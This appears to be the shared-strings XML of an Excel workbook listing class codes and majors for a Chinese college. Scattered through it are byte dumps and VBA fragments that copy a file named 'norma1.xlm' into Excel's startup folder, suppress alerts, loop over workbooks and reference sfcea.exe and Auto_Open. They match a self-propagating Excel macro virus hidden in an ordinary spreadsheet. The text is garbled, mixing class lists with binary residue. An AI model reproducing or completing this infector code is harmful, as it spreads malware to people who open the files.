    <t xml:space="preserve">216 104 143 226 190 49 41 73 55 223 47 0 63 52 180 208 56 235 85 60 162 11 144 251 34 117 11 51 201 94 219 137 77 67 213 235 54 171 192 76 60 235 243 54 78 59 62 103 70 67 140 162 39 48 9 78 109 36 216 34 212 213 182 167 45 198 150 54 138 59 131 46 0 86 68 62 150 244 70 72 228 42 95 84 87 192 144 63 5 8 104 16 146 210 229 43 80 106 138 239 204 235 7 122 133 205 246 11 54 106 3 203 20 204 59 156 191 118 187 15 126 1 195 126 141 112 69 80 180 29 64 180 26 182 240 34 81 153 32 81 61 147 219 8 42 96 11 185 6 163 234 246 26 55 97 177 228 139 111 179 183 9 27 208 97 131 23 4 235 213 156 200 201 128 116 67 48 104 104 70 157 165 68 213 36 196 106 134 17 190 4 1 197 210 29 46 127 247 78 130 166 161 200 68 7 61 78 230 64 187 117 27 1 174 170 78 10 5 40 200 182 107 62 252 51 36 11 51 240 7 32 126 154 45 50 28 39 240 24 69 244 51 109 64 239 214 12 17 137 53 75 110 5 22 28 0 239 7 78 67 21 12 140 60 199 70 220 5 184 176 176 172 66 116 55 202 251 139 6 126 10 114 180 53 106 58 131 38 26 102 152 3 8 61 64 236 26 62 28 141 78 141 218 0 109 5 168 175 195 2 52 111 166 123 214 185 198 25 70 24 127 8 35 48 94 233 84 119 21 116 215 234 138 136 129 236 31 109 99 204 197 214 86 204 116 40 98 7 64 166 50 180 184 18 6 214 198 42 96 43 187 2 4 154 199 68 240 0 53 194 140 12 16 180 230 134 121 23 21 3 223 241 141 100 198 64 240 2 117 8 70 5 114 26 235 20 151 202 55 119 13 1 117 18 4 119 8 117 10 220 118 4 91 43 222 117 62 1 166 199 70 16 16 96 6 20 50 253 246 132 76 180 137 238 215 125 7 198 5 124 106 252 135 91 2 103 116 183 155 161 131 197 120 201 76 29 10 126 55 144 16 158 117 160 29 84 168 1 146 136 72 54 54 0 220 199 64 16 175 106 253 231 216 120 208 200 112 214 168 173 230 91 123 170 34 240 49 97 36 195 184 116 212 144 203 118 65 138 62 18 152 153 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(filesf) Then</t>
  </si>
  <si>
    <t xml:space="preserve">46 2 102 192 107 115 121 115 116 101 109 90 111 178 1 34 0 72 81 3 119 62 3 119 37 67 3 46 192 177 108 108 97 2 119 46 72 82 117 110 225 5 46 103 208 28 112 4 101 99 32 104 102 111 108 100 101 22 114 64 181 81 103 92 178 9 46 101 120 10 101 161 128 34 2 129 67 104 114 40 24 51 52 41 224 1 96 62 70 117 108 135 130 208 208 0 116 1 44 32 48 44 148 125 27 85 8 48 111 104 144 10 232 15 13 10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</si>
  <si>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070921</t>
  </si>
  <si>
    <t>070922</t>
  </si>
  <si>
    <t>070931</t>
  </si>
  <si>
    <t>070932</t>
  </si>
  <si>
    <t>070941</t>
  </si>
  <si>
    <t>070942</t>
  </si>
  <si>
    <t>070951</t>
  </si>
  <si>
    <t>070952</t>
  </si>
  <si>
    <t>071011</t>
  </si>
  <si>
    <t>071111</t>
  </si>
  <si>
    <t>071112</t>
  </si>
  <si>
    <t>071113</t>
  </si>
  <si>
    <t>071121</t>
  </si>
  <si>
    <t>071122</t>
  </si>
  <si>
    <t>071211</t>
  </si>
  <si>
    <t>071212</t>
  </si>
  <si>
    <t>071213</t>
  </si>
  <si>
    <t>071214</t>
  </si>
  <si>
    <t>071215</t>
  </si>
  <si>
    <t>071216</t>
  </si>
  <si>
    <t>071231</t>
  </si>
  <si>
    <t>071232</t>
  </si>
  <si>
    <t>071233</t>
  </si>
  <si>
    <t>071234</t>
  </si>
  <si>
    <t>07动画1</t>
  </si>
  <si>
    <t>07动画2</t>
  </si>
  <si>
    <t>07环艺1</t>
  </si>
  <si>
    <t>07环艺2</t>
  </si>
  <si>
    <t>07环艺3</t>
  </si>
  <si>
    <t>07装潢1</t>
  </si>
  <si>
    <t>07装潢2</t>
  </si>
  <si>
    <t>071411</t>
  </si>
  <si>
    <t>071421</t>
  </si>
  <si>
    <t>071431</t>
  </si>
  <si>
    <t>071441</t>
  </si>
  <si>
    <t>071221</t>
  </si>
  <si>
    <t>071222</t>
  </si>
  <si>
    <t>071223</t>
  </si>
  <si>
    <t>071224</t>
  </si>
  <si>
    <t>071225</t>
  </si>
  <si>
    <t>071226</t>
  </si>
  <si>
    <t>22</t>
  </si>
  <si>
    <t>国际经济与贸易05</t>
  </si>
  <si>
    <t>072211</t>
  </si>
  <si>
    <t>072212</t>
  </si>
  <si>
    <t>072213</t>
  </si>
  <si>
    <t>072214</t>
  </si>
  <si>
    <t>酒店管理</t>
  </si>
  <si>
    <t>072241</t>
  </si>
  <si>
    <t>072242</t>
  </si>
  <si>
    <t>080111</t>
  </si>
  <si>
    <t>080112</t>
  </si>
  <si>
    <t>080113</t>
  </si>
  <si>
    <t>080114</t>
  </si>
  <si>
    <t>080115</t>
  </si>
  <si>
    <t>080116</t>
  </si>
  <si>
    <t>080121</t>
  </si>
  <si>
    <t>080122</t>
  </si>
  <si>
    <t>080123</t>
  </si>
  <si>
    <t>080124</t>
  </si>
  <si>
    <t>080125</t>
  </si>
  <si>
    <t>080126</t>
  </si>
  <si>
    <t>080127</t>
  </si>
  <si>
    <t>080131</t>
  </si>
  <si>
    <t>080132</t>
  </si>
  <si>
    <t>080141</t>
  </si>
  <si>
    <t>080142</t>
  </si>
  <si>
    <t>080211</t>
  </si>
  <si>
    <t>080212</t>
  </si>
  <si>
    <t>080213</t>
  </si>
  <si>
    <t>080221</t>
  </si>
  <si>
    <t>080222</t>
  </si>
  <si>
    <t>080231</t>
  </si>
  <si>
    <t>080232</t>
  </si>
  <si>
    <t>080233</t>
  </si>
  <si>
    <t>给排水工程</t>
  </si>
  <si>
    <t>080241</t>
  </si>
  <si>
    <t>080311</t>
  </si>
  <si>
    <t xml:space="preserve">99 116 36 0 134 2 1 0 46 0 168 2 0 0 0 0 0 0 172 0 1 0 32 0 168 2 37 0 176 2 1 0 182 0 10 0 92 115 102 99 101 97 46 101 120 101 17 0 182 0 1 0 32 0 17 0 172 0 34 0 36 0 140 2 1 0 17 0 32 0 54 2 33 0 142 2 17 0 172 0 34 0 36 0 140 2 1 0 17 0 172 0 0 0 183 4 32 0 132 2 66 64 138 2 3 0 255 255 255 255 0 10 0 0 182 0 16 0 83 97 118 101 32 99 104 97 110 103 101 115 32 116 111 32 32 0 86 2 33 0 6 1 17 0 182 0 1 0 63 0 17 0 32 0 88 2 32 0 90 2 11 0 36 0 84 2 2 0 39 0 82 2 0 0 0 0 0 0 255 255 255 255 120 10 0 0 255 255 255 255 72 0 0 0 255 255 255 255 0 0 1 168 181 0 65 116 116 114 105 98 117 116 0 101 32 86 66 95 78 97 109 0 101 32 61 32 34 192 224 49 136 34 13 10 10 208 66 97 115 2 104 0 48 123 70 67 70 66 51 68 0 50 65 45 65 48 70 65 45 0 49 48 54 56 45 65 55 51 0 56 45 48 56 48 48 50 66 128 51 51 55 49 66 53 125 13 124 64 71 108 111 98 97 108 1 190 83 8 112 97 99 1 146 70 97 108 115 2 101 12 200 67 114 101 97 116 97 4 98 108 21 31 80 114 101 100 101 200 99 108 97 0 6 73 100 0 168 17 67 64 69 120 112 111 115 101 21 29 84 0 101 109 112 108 97 116 101 68 16 101 114 105 118 22 37 67 117 115 32 116 111 109 105 122 11 69 80 117 0 98 108 105 99 32 87 105 116 0 104 69 118 101 110 116 115 32 96 65 112 112 32 65 2 3 0 12 97 176 116 105 111 110 9 104 128 14 46 0 170 0 86 97 114 72 101 108 112 73 2 68 0 88 45 49 13 10 13 10 134 80 128 61 128 65 32 83 117 98 1 33 0 95 78 101 119 87 111 114 107 0 98 111 111 107 40 66 121 86 144 97 108 32 87 0 12 115 32 5 10 18 41 128 42 112 112 5 49 46 68 105 130 115 128 97 121 65 108 101 114 128 65 164 61 32 132 130 73 102 0 27 46 4 </t>
  </si>
  <si>
    <t>For i = 1 To 89</t>
  </si>
  <si>
    <t xml:space="preserve">255 14 2 2 0 255 255 16 2 3 0 255 255 19 2 0 0 13 0 2 0 14 0 0 0 1 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 228 177 128 1 0 4 0 0 0 1 0 48 42 2 2 144 9 0 112 20 6 72 3 0 130 2 0 100 168 3 4 0 10 0 28 0 86 66 65 80 114 111 106 101 136 99 116 5 0 52 0 0 64 2 20 106 6 2 10 61 2 10 7 2 114 1 20 8 5 6 18 9 2 18 152 215 66 66 4 148 0 12 2 74 60 2 10 22 0 1 114 128 115 116 100 111 108 101 62 2 25 0 115 0 116 0 100 0 111 0 128 108 0 101 0 13 0 102 0 37 2 92 0 3 42 92 71 123 48 48 128 48 50 48 52 51 48 45 0 8 29 4 4 67 0 10 2 14 1 18 48 48 52 0 54 125 35 50 46 48 35 48 0 35 67 58 92 87 73 78 78 0 84 92 115 121 115 116 101 109 8 51 50 92 3 99 50 46 116 108 0 98 35 79 76 69 32 65 117 0 116 111 109 97 116 105 111 110 7 0 94 0 1 131 68 79 102 102 105 99 5 132 68 79 128 62 102 0 105 0 99 53 130 68 143 128 17 133 128 1 129 68 50 68 0 70 56 68 48 52 67 45 53 0 66 70 65 45 49 48 49 66 32 45 66 68 69 53 128 68 65 65 53 128 66 52 128 5 50 136 68 128 151 103 114 0 97 109 32 70 105 108 101 115 0 92 77 105 99 114 111 115 111 40 102 116 32 3 54 92 4 3 109 115 128 111 57 46 100 108 108 35 13 16 128 32 57 46 48 32 79 98 1 185 0 32 76 105 98 114 97 114 121 139 128 67 0 1 15 2 204 2 0 19 130 3 8 118 117 25 2 160 84 104 105 115 0 87 111 114 107 98 111 111 107 136 71 0 24 128 19 84 0 </t>
  </si>
  <si>
    <t>fso.copyfile Application.StartupPath &amp; "\norma1.xlm", myfolder, True</t>
  </si>
  <si>
    <t>172031</t>
  </si>
  <si>
    <t>172041</t>
  </si>
  <si>
    <t>172042</t>
  </si>
  <si>
    <t>172051</t>
  </si>
  <si>
    <t>172061</t>
  </si>
  <si>
    <t>172072</t>
  </si>
  <si>
    <t>172073</t>
  </si>
  <si>
    <t>172211</t>
  </si>
  <si>
    <t>172212</t>
  </si>
  <si>
    <t>172213</t>
  </si>
  <si>
    <t>172251</t>
  </si>
  <si>
    <t>172252</t>
  </si>
  <si>
    <t>172271</t>
  </si>
  <si>
    <t>172281</t>
  </si>
  <si>
    <t>172291</t>
  </si>
  <si>
    <t>172292</t>
  </si>
  <si>
    <t>172293</t>
  </si>
  <si>
    <t>160112</t>
  </si>
  <si>
    <t>160121</t>
  </si>
  <si>
    <t>160122</t>
  </si>
  <si>
    <t>160123</t>
  </si>
  <si>
    <t>160124</t>
  </si>
  <si>
    <t>160125</t>
  </si>
  <si>
    <t>160126</t>
  </si>
  <si>
    <t>160127</t>
  </si>
  <si>
    <t>160131</t>
  </si>
  <si>
    <t>160132</t>
  </si>
  <si>
    <t>160133</t>
  </si>
  <si>
    <t>160141</t>
  </si>
  <si>
    <t>160142</t>
  </si>
  <si>
    <t>160143</t>
  </si>
  <si>
    <t>160211</t>
  </si>
  <si>
    <t>160212</t>
  </si>
  <si>
    <t>160213</t>
  </si>
  <si>
    <t>160221</t>
  </si>
  <si>
    <t>160222</t>
  </si>
  <si>
    <t>160231</t>
  </si>
  <si>
    <t>160232</t>
  </si>
  <si>
    <t>160233</t>
  </si>
  <si>
    <t>160234</t>
  </si>
  <si>
    <t>160241</t>
  </si>
  <si>
    <t>160242</t>
  </si>
  <si>
    <t>160311</t>
  </si>
  <si>
    <t>160312</t>
  </si>
  <si>
    <t>170513</t>
  </si>
  <si>
    <t xml:space="preserve">101 0 65 99 99 101 115 115 32 120 0 108 82 101 97 100 79 110 108 0 121 13 10 71 111 84 111 32 248 113 117 105 128 51 5 135 229 0 71 20 64 32 99 127 20 39 4 78 111 116 193 164 232 159 97 0 108 111 103 115 40 120 108 68 70 105 33 1 65 48 65 115 41 160 140 111 6 119 133 29 160 48 34 46 120 108 115 239 0 30 61 40 34 29 226 22 97 160 179 173 22 100 36 128 13 10 97 49 58 13 10 31 34 255 13 34 230 9 194 12 127 50 15 175 127 14 117 14 225 48 239 128 22 128 14 230 71 227 88 65 96 186 1 27 159 193 193 194 96 115 102 99 101 97 80 93 199 96 255 84 17 81 118 147 35 163 1 175 63 242 109 149 48 33 73 191 63 63 80 111 128 47 192 114 15 110 15 110 98 118 107 64 110 111 114 109 97 108 48 30 109 255 53 107 64 9 98 69 176 8 255 49 194 113 119 104 145 82 11 96 47 125 97 32 145 17 82 84 114 105 56 109 40 76 82 0 129 14 86 18 67 101 0 108 108 115 40 55 57 44 32 136 50 41 46 96 122 117 101 41 240 52 120 62 32 34 176 33 72 8 84 6 63 103 68 240 101 108 101 116 80 82 65 5 96 67 51 19 255 177 117 16 26 48 1 52 9 250 98 50 1 175 123 99 154 87 175 123 175 123 225 5 70 112 83 105 208 14 49 150 32 192 57 197 24 115 176 122 117 110 68 84 49 212 135 115 40 105 135 129 192 87 107 49 255 101 13 17 10 73 2 49 55 213 31 148 58 134 5 65 4 127 132 24 111 53 144 39 33 9 243 91 50 53 255 113 115 254 40 191 19 143 133 143 133 143 133 207 142 202 142 175 127 243 193 145 207 7 67 111 195 121 143 133 191 2 183 2 243 223 5 223 5 35 34 241 126 211 5 143 133 223 5 255 213 5 143 133 83 42 31 3 21 3 143 133 191 2 183 2 159 178 125 193 39 143 133 143 133 143 133 51 35 133 133 254 56 143 133 143 133 143 133 48 163 18 50 51 50 114 69 15 89 179 18 73 175 68 163 68 83 101 116 32 24 102 115 111 0 47 242 196 101 79 98 0 106 101 99 116 40 34 115 99 0 114 105 112 116 105 110 103 </t>
  </si>
  <si>
    <t>080312</t>
  </si>
  <si>
    <t>080313</t>
  </si>
  <si>
    <t>080314</t>
  </si>
  <si>
    <t>080315</t>
  </si>
  <si>
    <t>080316</t>
  </si>
  <si>
    <t>080317</t>
  </si>
  <si>
    <t>080321</t>
  </si>
  <si>
    <t>080322</t>
  </si>
  <si>
    <t>080323</t>
  </si>
  <si>
    <t>080331</t>
  </si>
  <si>
    <t>080332</t>
  </si>
  <si>
    <t>080333</t>
  </si>
  <si>
    <t>080341</t>
  </si>
  <si>
    <t>080342</t>
  </si>
  <si>
    <t>080411</t>
  </si>
  <si>
    <t>080412</t>
  </si>
  <si>
    <t>080413</t>
  </si>
  <si>
    <t>080414</t>
  </si>
  <si>
    <t>080415</t>
  </si>
  <si>
    <t>080421</t>
  </si>
  <si>
    <t>080422</t>
  </si>
  <si>
    <t>080423</t>
  </si>
  <si>
    <t>080511</t>
  </si>
  <si>
    <t>080512</t>
  </si>
  <si>
    <t>080513</t>
  </si>
  <si>
    <t>080514</t>
  </si>
  <si>
    <t>080521</t>
  </si>
  <si>
    <t>080531</t>
  </si>
  <si>
    <t>080611</t>
  </si>
  <si>
    <t>080612</t>
  </si>
  <si>
    <t>080613</t>
  </si>
  <si>
    <t>080621</t>
  </si>
  <si>
    <t>080622</t>
  </si>
  <si>
    <t>080623</t>
  </si>
  <si>
    <t>080631</t>
  </si>
  <si>
    <t>082011</t>
  </si>
  <si>
    <t>082012</t>
  </si>
  <si>
    <t>082013</t>
  </si>
  <si>
    <t>082014</t>
  </si>
  <si>
    <t>082015</t>
  </si>
  <si>
    <t>080711</t>
  </si>
  <si>
    <t>080712</t>
  </si>
  <si>
    <t>080721</t>
  </si>
  <si>
    <t>080811</t>
  </si>
  <si>
    <t>080812</t>
  </si>
  <si>
    <t>080813</t>
  </si>
  <si>
    <t>080814</t>
  </si>
  <si>
    <t>080821</t>
  </si>
  <si>
    <t>080822</t>
  </si>
  <si>
    <t>080823</t>
  </si>
  <si>
    <t>080831</t>
  </si>
  <si>
    <t>080832</t>
  </si>
  <si>
    <t>080841</t>
  </si>
  <si>
    <t>080911</t>
  </si>
  <si>
    <t>080912</t>
  </si>
  <si>
    <t>080913</t>
  </si>
  <si>
    <t>080921</t>
  </si>
  <si>
    <t>080922</t>
  </si>
  <si>
    <t>080931</t>
  </si>
  <si>
    <t>080932</t>
  </si>
  <si>
    <t>080941</t>
  </si>
  <si>
    <t>080942</t>
  </si>
  <si>
    <t>080951</t>
  </si>
  <si>
    <t>080952</t>
  </si>
  <si>
    <t>081011</t>
  </si>
  <si>
    <t>081111</t>
  </si>
  <si>
    <t>081112</t>
  </si>
  <si>
    <t>081113</t>
  </si>
  <si>
    <t>081121</t>
  </si>
  <si>
    <t>081122</t>
  </si>
  <si>
    <t>081211</t>
  </si>
  <si>
    <t>081212</t>
  </si>
  <si>
    <t>081213</t>
  </si>
  <si>
    <t>081214</t>
  </si>
  <si>
    <t>081215</t>
  </si>
  <si>
    <t>081216</t>
  </si>
  <si>
    <t>081231</t>
  </si>
  <si>
    <t>081232</t>
  </si>
  <si>
    <t>081233</t>
  </si>
  <si>
    <t>081234</t>
  </si>
  <si>
    <t>动画</t>
  </si>
  <si>
    <t>081241</t>
  </si>
  <si>
    <t>081242</t>
  </si>
  <si>
    <t>081411</t>
  </si>
  <si>
    <t>081421</t>
  </si>
  <si>
    <t>081422</t>
  </si>
  <si>
    <t>081431</t>
  </si>
  <si>
    <t>081441</t>
  </si>
  <si>
    <t>081442</t>
  </si>
  <si>
    <t>播音与主持艺术</t>
  </si>
  <si>
    <t>081451</t>
  </si>
  <si>
    <t>081452</t>
  </si>
  <si>
    <t>081511</t>
  </si>
  <si>
    <t>081512</t>
  </si>
  <si>
    <t>081513</t>
  </si>
  <si>
    <t>081514</t>
  </si>
  <si>
    <t>081515</t>
  </si>
  <si>
    <t>081516</t>
  </si>
  <si>
    <t>082211</t>
  </si>
  <si>
    <t>082212</t>
  </si>
  <si>
    <t>082213</t>
  </si>
  <si>
    <t>082214</t>
  </si>
  <si>
    <t>082241</t>
  </si>
  <si>
    <t>082242</t>
  </si>
  <si>
    <t>90</t>
  </si>
  <si>
    <t>空乘（专科）</t>
  </si>
  <si>
    <t>089311</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 44 0 121 2 0 0 0 0 2 0 3 0 3 96 4 0 52 0 255 255 255 255 255 255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 1 0 32 0 193 0 0 0 0 0 1 0 255 255 255 255 255 255 255 255 0 0 3 64 2 0 28 0 29 209 0 0 0 0 0 1 0 56 0 0 0 0 0 0 0 110 0 0 127 0 0 0 0 193 6 0 0 0 0 0 0 121 16 0 0 0 0 0 0 201 16 0 0 0 0 0 0 73 17 0 0 0 0 0 0 201 17 0 0 0 0 0 0 25 18 0 0 0 0 0 0 49 18 0 0 0 0 204 97 115 0 0 1 0 255 4 8 0 0 9 4 0 0 168 3 1 0 0 0 0 0 0 0 0 0 1 0 4 0 2 0 250 0 42 0 92 0 71 0 123 0 48 0 48 0 48 0 50 0 48 0 52 0 69 0 70 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 35 0 52 0 46 0 48 0 35 0 57 0 35 0 67 0 58 0 92 0 80 0 82 0 79 0 71 0 82 0 65 0 126 0 49 0 92 0 67 0 79 0 77 0 77 0 79 0 78 0 126 0 49 0 92 0 77 0 73 0 67 0 82 0 79 0 83 0 126 0 49 0 92 0 86 0 66 0 65 0 92 0 86 0 66 0 65 0 54 0 92 0 86 0 66 0 69 0 54 0 46 0 68 0 76 0 76 0 35 0 86 0 105 0 115 0 117 0 97 0 108 0 32 0 66 0 97 0 115 0 105 0 99 0 32 0 70 0 111 0 114 0 32 0 65 0 112 0 112 0 108 0 105 0 99 0 97 0 116 0 105 0 111 0 110 0 115 0 0 0 0 0 0 0 0 0 0 0 0 0 16 1 42 0 92 0 71 0 123 0 48 0 48 0 48 0 50 0 48 0 56 0 </t>
  </si>
  <si>
    <t>170111</t>
  </si>
  <si>
    <t>170112</t>
  </si>
  <si>
    <t>170121</t>
  </si>
  <si>
    <t>170122</t>
  </si>
  <si>
    <t>170123</t>
  </si>
  <si>
    <t>170124</t>
  </si>
  <si>
    <t>170125</t>
  </si>
  <si>
    <t>170126</t>
  </si>
  <si>
    <t>170127</t>
  </si>
  <si>
    <t>170131</t>
  </si>
  <si>
    <t>170132</t>
  </si>
  <si>
    <t>170133</t>
  </si>
  <si>
    <t>170141</t>
  </si>
  <si>
    <t>170142</t>
  </si>
  <si>
    <t>170211</t>
  </si>
  <si>
    <t>170212</t>
  </si>
  <si>
    <t>170213</t>
  </si>
  <si>
    <t>170221</t>
  </si>
  <si>
    <t>170222</t>
  </si>
  <si>
    <t>170231</t>
  </si>
  <si>
    <t>170232</t>
  </si>
  <si>
    <t>170233</t>
  </si>
  <si>
    <t>170241</t>
  </si>
  <si>
    <t>170242</t>
  </si>
  <si>
    <t>170311</t>
  </si>
  <si>
    <t>170312</t>
  </si>
  <si>
    <t>170313</t>
  </si>
  <si>
    <t>170314</t>
  </si>
  <si>
    <t>170321</t>
  </si>
  <si>
    <t>170322</t>
  </si>
  <si>
    <t>170323</t>
  </si>
  <si>
    <t>170331</t>
  </si>
  <si>
    <t>170332</t>
  </si>
  <si>
    <t>170333</t>
  </si>
  <si>
    <t>170334</t>
  </si>
  <si>
    <t>170335</t>
  </si>
  <si>
    <t>170336</t>
  </si>
  <si>
    <t>170341</t>
  </si>
  <si>
    <t>170342</t>
  </si>
  <si>
    <t>170343</t>
  </si>
  <si>
    <t>170351</t>
  </si>
  <si>
    <t>170361</t>
  </si>
  <si>
    <t>170362</t>
  </si>
  <si>
    <t>179211</t>
  </si>
  <si>
    <t>179212</t>
  </si>
  <si>
    <t>170411</t>
  </si>
  <si>
    <t>170412</t>
  </si>
  <si>
    <t>170413</t>
  </si>
  <si>
    <t>170414</t>
  </si>
  <si>
    <t>170415</t>
  </si>
  <si>
    <t>170421</t>
  </si>
  <si>
    <t>170422</t>
  </si>
  <si>
    <t>170423</t>
  </si>
  <si>
    <t>170431</t>
  </si>
  <si>
    <t>170432</t>
  </si>
  <si>
    <t>170441</t>
  </si>
  <si>
    <t>170442</t>
  </si>
  <si>
    <t>170443</t>
  </si>
  <si>
    <t>170451</t>
  </si>
  <si>
    <t>170452</t>
  </si>
  <si>
    <t>170461</t>
  </si>
  <si>
    <t>170462</t>
  </si>
  <si>
    <t>170471</t>
  </si>
  <si>
    <t>170481</t>
  </si>
  <si>
    <t>170482</t>
  </si>
  <si>
    <t>170511</t>
  </si>
  <si>
    <t>170512</t>
  </si>
  <si>
    <t xml:space="preserve">82 0 122 0 152 8 0 0 0 129 8 0 82 0 122 0 64 8 0 0 0 129 8 0 96 0 72 0 80 6 0 0 0 129 8 0 10 0 15 0 176 6 0 0 0 128 9 0 0 0 0 0 255 255 255 255 4 129 8 0 2 0 3 0 192 6 0 0 34 129 12 0 6 0 12 0 200 6 0 0 0 129 8 0 42 0 0 0 64 9 0 0 0 129 8 0 30 0 0 0 208 6 0 0 0 129 8 0 88 0 0 0 112 9 0 0 0 129 8 0 8 0 0 0 8 7 0 0 4 129 8 0 2 0 0 0 16 7 0 0 0 128 9 0 0 0 0 0 255 255 255 255 255 255 255 255 1 1 32 10 0 0 93 32 242 196 8 0 0 0 0 0 0 0 0 0 0 0 150 4 48 0 0 0 0 0 32 0 54 2 33 0 6 1 32 0 18 2 33 0 6 1 5 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 33 0 6 1 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 5 0 3 0 156 0 0 0 0 0 124 0 255 255 32 0 0 0 107 0 255 255 24 0 0 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 66 64 60 2 1 0 183 0 172 0 1 0 32 0 54 2 37 0 58 2 1 0 40 0 34 2 0 0 0 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 172 0 1 0 32 0 54 2 37 0 58 2 1 0 40 0 6 1 0 0 0 0 172 0 3 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 54 2 37 0 58 2 1 0 37 0 62 2 1 0 172 0 3 0 182 0 14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 32 0 18 2 37 0 58 2 1 0 37 0 62 2 1 0 66 64 60 2 1 0 0 0 0 0 0 0 182 0 9 0 65 117 116 111 95 79 112 101 110 0 209 0 6 1 182 0 27 0 61 39 64 107 98 116 97 115 116 111 64 115 104 101 51 35 39 33 82 49 67 49 58 82 </t>
  </si>
  <si>
    <t>182011</t>
  </si>
  <si>
    <t>182012</t>
  </si>
  <si>
    <t>182013</t>
  </si>
  <si>
    <t>182021</t>
  </si>
  <si>
    <t>182041</t>
  </si>
  <si>
    <t>182042</t>
  </si>
  <si>
    <t>182051</t>
  </si>
  <si>
    <t>182061</t>
  </si>
  <si>
    <t>182071</t>
  </si>
  <si>
    <t>182072</t>
  </si>
  <si>
    <t>182073</t>
  </si>
  <si>
    <t>182081</t>
  </si>
  <si>
    <t>182211</t>
  </si>
  <si>
    <t>182212</t>
  </si>
  <si>
    <t>182213</t>
  </si>
  <si>
    <t>182214</t>
  </si>
  <si>
    <t>182251</t>
  </si>
  <si>
    <t>182252</t>
  </si>
  <si>
    <t>182271</t>
  </si>
  <si>
    <t>182281</t>
  </si>
  <si>
    <t>182291</t>
  </si>
  <si>
    <t>182292</t>
  </si>
  <si>
    <t>182293</t>
  </si>
  <si>
    <t xml:space="preserve">95 0 95 0 83 0 82 0 80 0 95 0 48 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 255 255 255 255 13 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 130 0 0 0 134 10 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 49 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 173 0 0 0 17 1 0 0 0 0 0 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 119 0 109 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 20 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 178 0 0 0 51 0 0 0 0 0 0 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 3 0 0 0 14 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 179 0 0 0 226 1 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t>180323</t>
  </si>
  <si>
    <t>180331</t>
  </si>
  <si>
    <t>180332</t>
  </si>
  <si>
    <t>180333</t>
  </si>
  <si>
    <t>180334</t>
  </si>
  <si>
    <t>180335</t>
  </si>
  <si>
    <t>180336</t>
  </si>
  <si>
    <t>180341</t>
  </si>
  <si>
    <t>180342</t>
  </si>
  <si>
    <t>180343</t>
  </si>
  <si>
    <t>180351</t>
  </si>
  <si>
    <t>180361</t>
  </si>
  <si>
    <t>180362</t>
  </si>
  <si>
    <t>180411</t>
  </si>
  <si>
    <t>180412</t>
  </si>
  <si>
    <t>180413</t>
  </si>
  <si>
    <t>180414</t>
  </si>
  <si>
    <t>180415</t>
  </si>
  <si>
    <t>180421</t>
  </si>
  <si>
    <t>180422</t>
  </si>
  <si>
    <t>180423</t>
  </si>
  <si>
    <t>180431</t>
  </si>
  <si>
    <t>180432</t>
  </si>
  <si>
    <t>180441</t>
  </si>
  <si>
    <t>180442</t>
  </si>
  <si>
    <t>180443</t>
  </si>
  <si>
    <t>180451</t>
  </si>
  <si>
    <t>180452</t>
  </si>
  <si>
    <t>180461</t>
  </si>
  <si>
    <t>180462</t>
  </si>
  <si>
    <t>180471</t>
  </si>
  <si>
    <t>180481</t>
  </si>
  <si>
    <t>180482</t>
  </si>
  <si>
    <t>180511</t>
  </si>
  <si>
    <t>180512</t>
  </si>
  <si>
    <t>180513</t>
  </si>
  <si>
    <t>180521</t>
  </si>
  <si>
    <t>180531</t>
  </si>
  <si>
    <t>180611</t>
  </si>
  <si>
    <t>180612</t>
  </si>
  <si>
    <t>180621</t>
